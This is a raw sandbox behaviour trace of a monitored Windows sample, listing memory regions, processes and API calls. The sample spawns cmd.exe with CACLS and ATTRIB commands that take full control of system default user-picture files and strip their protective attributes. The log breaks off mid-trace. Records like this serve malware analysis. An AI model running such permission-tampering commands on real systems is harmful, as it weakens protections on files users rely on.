start_va = 0xad0000 end_va = 0xad8fff entry_point = 0xad0000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27097 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27098 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27099 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27100 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 27101 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27102 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27103 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27104 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27105 start_va = 0xc0000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 27106 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 27107 start_va = 0x75540000 end_va = 
0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27108 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27109 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27110 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27111 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27112 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27113 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 563 os_tid = 0xa08 Thread: id = 564 os_tid = 0xfb4 Process: id = "396" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16c20" os_pid = "0x720" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "394" os_parent_pid = "0x924" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27114 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27115 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27116 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27117 start_va = 0x150000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 27118 start_va = 0xc00000 end_va = 0xc06fff entry_point = 0xc00000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27119 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27120 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27121 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27122 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd3000" filename = "" Region: id = 27123 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27124 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27125 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27126 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27127 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 27128 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 27129 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27130 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27131 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27132 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27133 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27134 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27135 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27136 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27137 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27138 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27139 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27140 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27141 start_va = 0x2a0000 end_va = 0x367fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 27142 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27143 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 565 os_tid = 0xd88 Process: id = "397" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16d80" os_pid = "0x908" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27144 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27145 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27146 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27147 start_va = 0x190000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 27148 start_va = 0x4a9c0000 end_va = 0x4aa0bfff 
entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27149 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27150 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27151 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27152 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 27153 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27154 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27155 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27156 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 27157 start_va = 0x290000 end_va = 0x2f6fff entry_point = 0x290000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27158 start_va = 0x3e0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 27159 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 
region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27160 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27161 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27162 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27163 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27164 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27165 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27166 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27167 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27168 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 27169 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27170 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27171 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 27172 start_va = 0x160000 end_va = 0x161fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 27173 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 27174 start_va = 0x180000 end_va = 0x180fff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 27175 start_va = 0x3f0000 end_va = 0x4f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 27176 start_va = 0x500000 end_va = 0x10fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 27177 start_va = 0x1100000 end_va = 0x1262fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001100000" filename = "" Region: id = 27178 start_va = 0x1270000 end_va = 0x153efff entry_point = 0x1270000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 566 os_tid = 0xf3c [0187.564] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f784 | out: 
lpSystemTimeAsFileTime=0x28f784*(dwLowDateTime=0xa4b2a200, dwHighDateTime=0x1d440a9)) [0187.564] GetCurrentProcessId () returned 0x908 [0187.564] GetCurrentThreadId () returned 0xf3c [0187.564] GetTickCount () returned 0x3589a [0187.564] QueryPerformanceCounter (in: lpPerformanceCount=0x28f77c | out: lpPerformanceCount=0x28f77c*=24435340670) returned 1 [0187.565] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0187.565] __set_app_type (_Type=0x1) [0187.565] __p__fmode () returned 0x76b331f4 [0187.565] __p__commode () returned 0x76b331fc [0187.574] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0187.574] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0187.575] GetCurrentThreadId () returned 0xf3c [0187.575] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf3c) returned 0x38 [0187.575] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0187.575] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0187.575] SetThreadUILanguage (LangId=0x0) returned 0x409 [0187.575] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0187.575] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f714 | out: phkResult=0x28f714*=0x0) returned 0x2 [0187.575] VirtualQuery (in: lpAddress=0x28f74b, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0187.575] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f6e4, dwLength=0x1c | out: lpBuffer=0x28f6e4*(BaseAddress=0x290000, AllocationBase=0x290000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0187.575] GetConsoleOutputCP () returned 0x1b5 [0187.575] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0187.576] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0187.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0187.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.576] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0187.576] _get_osfhandle (_FileHandle=1) returned 0x7 [0187.576] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0187.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.576] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0187.576] _get_osfhandle (_FileHandle=0) returned 0x3 [0187.576] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0187.576] GetEnvironmentStringsW () returned 0x60308* [0187.577] FreeEnvironmentStringsW (penv=0x60308) returned 1 [0187.577] GetEnvironmentStringsW () returned 0x60308* [0187.577] FreeEnvironmentStringsW (penv=0x60308) returned 1 
[0187.577] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e684 | out: phkResult=0x28e684*=0x40) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0xb8, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x0, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegCloseKey (hKey=0x40) returned 0x0 [0187.577] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e684 | out: phkResult=0x28e684*=0x40) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x40, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x1, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x0, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x9, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x4, lpData=0x28e690*=0x9, lpcbData=0x28e688*=0x4) returned 0x0 [0187.577] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e68c, lpData=0x28e690, lpcbData=0x28e688*=0x1000 | out: lpType=0x28e68c*=0x0, lpData=0x28e690*=0x9, lpcbData=0x28e688*=0x1000) returned 0x2 [0187.577] RegCloseKey (hKey=0x40) returned 0x0 [0187.577] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886395 [0187.577] srand (_Seed=0x5b886395) [0187.577] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" [0187.577] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp\"" [0187.578] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0187.578] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x61a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0187.578] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0187.578] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0187.578] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0187.578] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0187.578] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0187.578] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0187.578] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0187.578] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0187.578] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0187.578] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0187.578] 
